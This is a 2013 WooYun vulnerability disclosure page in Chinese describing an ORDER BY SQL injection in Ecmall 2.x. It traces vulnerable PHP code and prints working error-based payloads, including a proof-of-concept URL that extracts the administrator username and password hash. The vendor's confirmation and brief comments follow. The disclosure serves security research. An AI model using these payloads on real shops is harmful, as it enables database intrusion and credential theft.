当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(13) 关注此漏洞

缺陷编号: WooYun-2013-38213

漏洞标题: Ecmall 2.x版本存在通杀SQL注入漏洞

相关厂商: ShopEx

漏洞作者: Chora认证白帽子

提交时间: 2013-09-26 10:50

公开时间: 2013-12-25 10:50

漏洞类型: SQL注射漏洞

危害等级: 中

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

3人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-26: 细节已通知厂商并且等待厂商处理中
2013-09-26: 厂商已经确认,细节仅向厂商公开
2013-09-29: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2013-11-20: 细节向核心白帽子及相关领域专家公开
2013-11-30: 细节向普通白帽子公开
2013-12-10: 细节向实习白帽子公开
2013-12-25: 细节向公众公开

简要描述:

本来想早点分析完然后奋斗ECSHOP...结果一直不给老衲机会啊,越来越不敢相信是不是官方版本了,是不是下错了.酒喝多了头有点晕.不知道有没有把分析写错...

详细说明:

order by 参数注入,后面不能跟union,但是可以用双重查询.

select...from...order by 1 and (select user_name from ecm_member where user_id=1)

或者

select...from...order by 1,(select user_name from ecm_member where user_id=1)

但是在第2个select里面可以用union

select...from...order by 1 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)



select...from...order by 1,(select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)



app/my_goods.app.php

code 区域
function index()
{
/* 取得店铺商品分类 */
$this->assign('sgcategories', $this->_get_sgcategory_options());

$conditions = $this->_get_conditions();
$page = $this->_get_page();
$page_nolimit = array();
$goods_list = $this->_get_goods($conditions, $page); //跟进
$all_goods = $this->_get_goods($conditions, $page_nolimit);
......
}
function _get_goods($conditions, &$page)
{
if (intval($_GET['sgcate_id']) > 0)
{
$cate_mod =& bm('gcategory', array('_store_id' => $this->_store_id));
$cate_ids = $cate_mod->get_descendant_ids(intval($_GET['sgcate_id']));
}
else
{
$cate_ids = 0;
}

// 标识有没有过滤条件
if ($conditions != '1 = 1' || !empty($_GET['sgcate_id']))
{
$this->assign('filtered', 1);
}

//更新排序
if (isset($_GET['sort']) && isset($_GET['order']))
{
$sort = strtolower(trim($_GET['sort'])); //未过滤
$order = strtolower(trim($_GET['order']));
if (!in_array($order,array('asc','desc'))) //只限制了order,没有限制sort
{
$sort = 'goods_id';
$order = 'desc';
}
}
else
{
$sort = 'goods_id';
$order = 'desc';
}

if ($page)
{
$limit = $page['limit'];
$count = true;
}
else
{
$limit = '';
$count = false;
}

/* 取得商品列表 */

$goods_list = $this->_goods_mod->get_list(array(
'conditions' => $conditions,
'count' => $count,
'order' => "$sort $order", //select...from...order by 注入
'limit' => $limit,
), $cate_ids);
return $goods_list;
}



includes/models/goods.model.php

code 区域
function get_list($params = array(), $scate_ids = array(), $desc = false, $no_picture = true)
{
is_int($scate_ids) && $scate_ids > 0 && $scate_ids = array($scate_ids);

extract($this->_initFindParams($params));//将上面数组的键名作为变量名,值作为变量的值(包含$order变量).
......
/* 条件(WHERE) */
$conditions = $this->_getConditions($conditions, true);
$conditions .= " AND gs.spec_id IS NOT NULL AND s.store_id IS NOT NULL ";
if ($scate_ids)
{
......
}

/* 排序(ORDER BY) */
if ($order)
{
$order = ' ORDER BY ' . $this->getRealFields($order) . ', s.sort_order '; //跟进
}

/* 分页(LIMIT) */
$limit && $limit = ' LIMIT ' . $limit;
if ($count)
{
$this->_updateLastQueryCount("SELECT COUNT(*) as c FROM {$tables}{$conditions}");
}

/* 完整的SQL */
$this->temp = $tables . $conditions;
$sql = "SELECT {$fields} FROM {$tables}{$conditions}{$order}{$limit}";

$goods_list = $index_key ? $this->db->getAllWithIndex($sql, $index_key) : $this->db->getAll($sql); //带入查询
......
}



eccore/model/model.base.php

code 区域
function getRealFields($src_fields_list)
{
$fields = $src_fields_list;
if (!$src_fields_list)
{
$fields = '';
}
$fields = preg_replace('/([a-zA-Z0-9_]+)\.([a-zA-Z0-9_*]+)/e', "\$this->_getFieldTable('\\1') . '.\\2'", $fields); //正则无影响...
return $fields;
}





http://localhost/ecmall/index.php?app=my_goods&act=index&order=asc&sort=1 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)%23

漏洞证明:

1.jpg

修复方案:

过滤...

版权声明:转载请注明来源 Chora@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-09-26 10:55

厂商回复:

非常感谢您为shopex信息安全做的贡献
我们将尽快修复
非常感谢

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2013-09-26 14:13 | ppt ( 路人 | Rank:11 漏洞数:2 | ) | ( 我猜出了用户名,可我没猜出密码。)
    2

    看来ecmall的漏洞不少

  2. 2013-10-17 11:54 | 虾米 ( 普通白帽子 | Rank:105 漏洞数:13 )
    0

    问题似乎有点大

登录后才能发表评论,请先 登录